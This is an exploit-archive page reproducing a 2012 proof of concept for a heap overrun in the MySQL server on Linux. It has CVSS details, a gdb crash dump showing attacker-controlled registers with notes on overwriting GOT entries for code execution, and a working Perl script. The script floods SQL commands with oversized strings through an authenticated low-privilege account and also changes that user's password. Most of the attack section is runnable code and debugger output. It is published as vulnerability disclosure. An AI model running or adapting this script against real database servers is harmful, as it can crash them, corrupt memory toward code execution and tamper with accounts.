MySQL (Linux) Heap Based Overrun PoC Zeroday

2012-12-02 / 2012-12-04
Credit: Kingcope
Risk: Medium
Local: Yes
Remote: No
CWE: CWE-119


CVSS Base Score: 6.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# MySQL Heap Overrun # tested for the latest version of mysql server on a SuSE Linux system # # As seen below $edx and $edi are fully controlled, # the current instruction is # => 0x83a6b24 <free_root+180>: mov (%edx),%edi # this means we landed in a place where 4 bytes can be controlled by 4 bytes # with this function pointers and GOT entries can be rewritten to execute arbritrary code # # a user account (with less privileges) is needed # beware: this script will change the users password to an undefined value # =for comment Program received signal SIGSEGV, Segmentation fault. [Switching to Thread 0xa86b3b70 (LWP 9219)] free_root (root=0x8e7c714, MyFlags=1) at /root/mysql-5.5.19/mysys/my_alloc.c:369 369 old=next; next= next->next; (gdb) bt #0 free_root (root=0x8e7c714, MyFlags=1) at /root/mysql-5.5.19/mysys/my_alloc.c:369 #1 0x082a2e9f in cleanup (thd=0x8e7b9b8, all=true) at /root/mysql-5.5.19/sql/sql_class.h:1709 #2 ha_rollback_trans (thd=0x8e7b9b8, all=true) at /root/mysql-5.5.19/sql/handler.cc:1401 #3 0x0824a747 in trans_rollback (thd=0x8e7b9b8) at /root/mysql-5.5.19/sql/transaction.cc:260 #4 0x081897a7 in THD::cleanup (this=0x8e7b9b8) at /root/mysql-5.5.19/sql/sql_class.cc:1271 #5 0x08140fc3 in thd_cleanup (thd=0x8e7b9b8) at /root/mysql-5.5.19/sql/mysqld.cc:2026 #6 unlink_thd (thd=0x8e7b9b8) at /root/mysql-5.5.19/sql/mysqld.cc:2075 #7 0x08141088 in one_thread_per_connection_end (thd=0x8e7b9b8, put_in_cache=true) at /root/mysql-5.5.19/sql/mysqld.cc:2188 #8 0x0823eab3 in do_handle_one_connection (thd_arg=0x8e7b9b8) at /root/mysql-5.5.19/sql/sql_connect.cc:796 #9 0x0823ebbc in handle_one_connection (arg=0x8e7b9b8) at /root/mysql-5.5.19/sql/sql_connect.cc:708 #10 0xb7744b05 in start_thread () from /lib/libpthread.so.0 #11 0xb750fd5e in clone () from /lib/libc.so.6 (gdb) i r eax 0x8ec63b8 149709752 ecx 0xa86b326c -1469369748 edx 0x5a5a5a5a 1515870810 ebx 0x880eff4 142667764 esp 0xa86b31b0 0xa86b31b0 ebp 0xa86b31d8 0xa86b31d8 esi 0x8e7c714 149407508 edi 0x5a5a5a5a 1515870810 eip 0x83a6b24 0x83a6b24 <free_root+180> eflags 0x210293 [ CF AF SF IF RF ID ] cs 0x73 115 ss 0x7b 123 ds 0x7b 123 es 0x7b 123 fs 0x0 0 gs 0x33 51 (gdb) x/10i $eip => 0x83a6b24 <free_root+180>: mov (%edx),%edi 0x83a6b26 <free_root+182>: je 0x83a6b33 <free_root+195> 0x83a6b28 <free_root+184>: mov %edx,(%esp) 0x83a6b2b <free_root+187>: call 0x83acb70 <my_free> 0x83a6b30 <free_root+192>: mov 0x8(%esi),%eax 0x83a6b33 <free_root+195>: test %edi,%edi 0x83a6b35 <free_root+197>: jne 0x83a6b20 <free_root+176> 0x83a6b37 <free_root+199>: test %eax,%eax 0x83a6b39 <free_root+201>: movl $0x0,(%esi) 0x83a6b3f <free_root+207>: movl $0x0,0x4(%esi) (gdb) =cut use Net::MySQL; use Encode; $|=1; my $mysql = Net::MySQL->new( hostname => '192.168.2.3', database => "test", user => "user", password => "test", debug => 0, port => 3306, ); @commands = ('USE d', 'SHOW TABLES FROM d', "DESCRIBE t", "SHOW FIELDS FROM t", "SHOW COLUMNS FROM t", "SHOW INDEX FROM t", "CREATE TABLE table_name (c CHAR(1))", "DROP TABLE t", "ALTER TABLE t DROP c", "DELETE FROM t WHERE 1=1", "UPDATE t SET a=a","SET PASSWORD=PASSWORD('p')"); foreach my $command (@commands) { for ($k=0;$k<length($command);$k++) { $c = substr($command, 0, $k) . "Z" x 10000 . substr($command, $k+1); $c2 = substr($command, 0, $k) . "AAAA..AA" . substr($command, $k+1); print "$c2"; $mysql->query($c); } } $mysql->close;

References:

http://seclists.org/fulldisclosure/2012/Dec/5
https://bugzilla.redhat.com/show_bug.cgi?id=882600


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top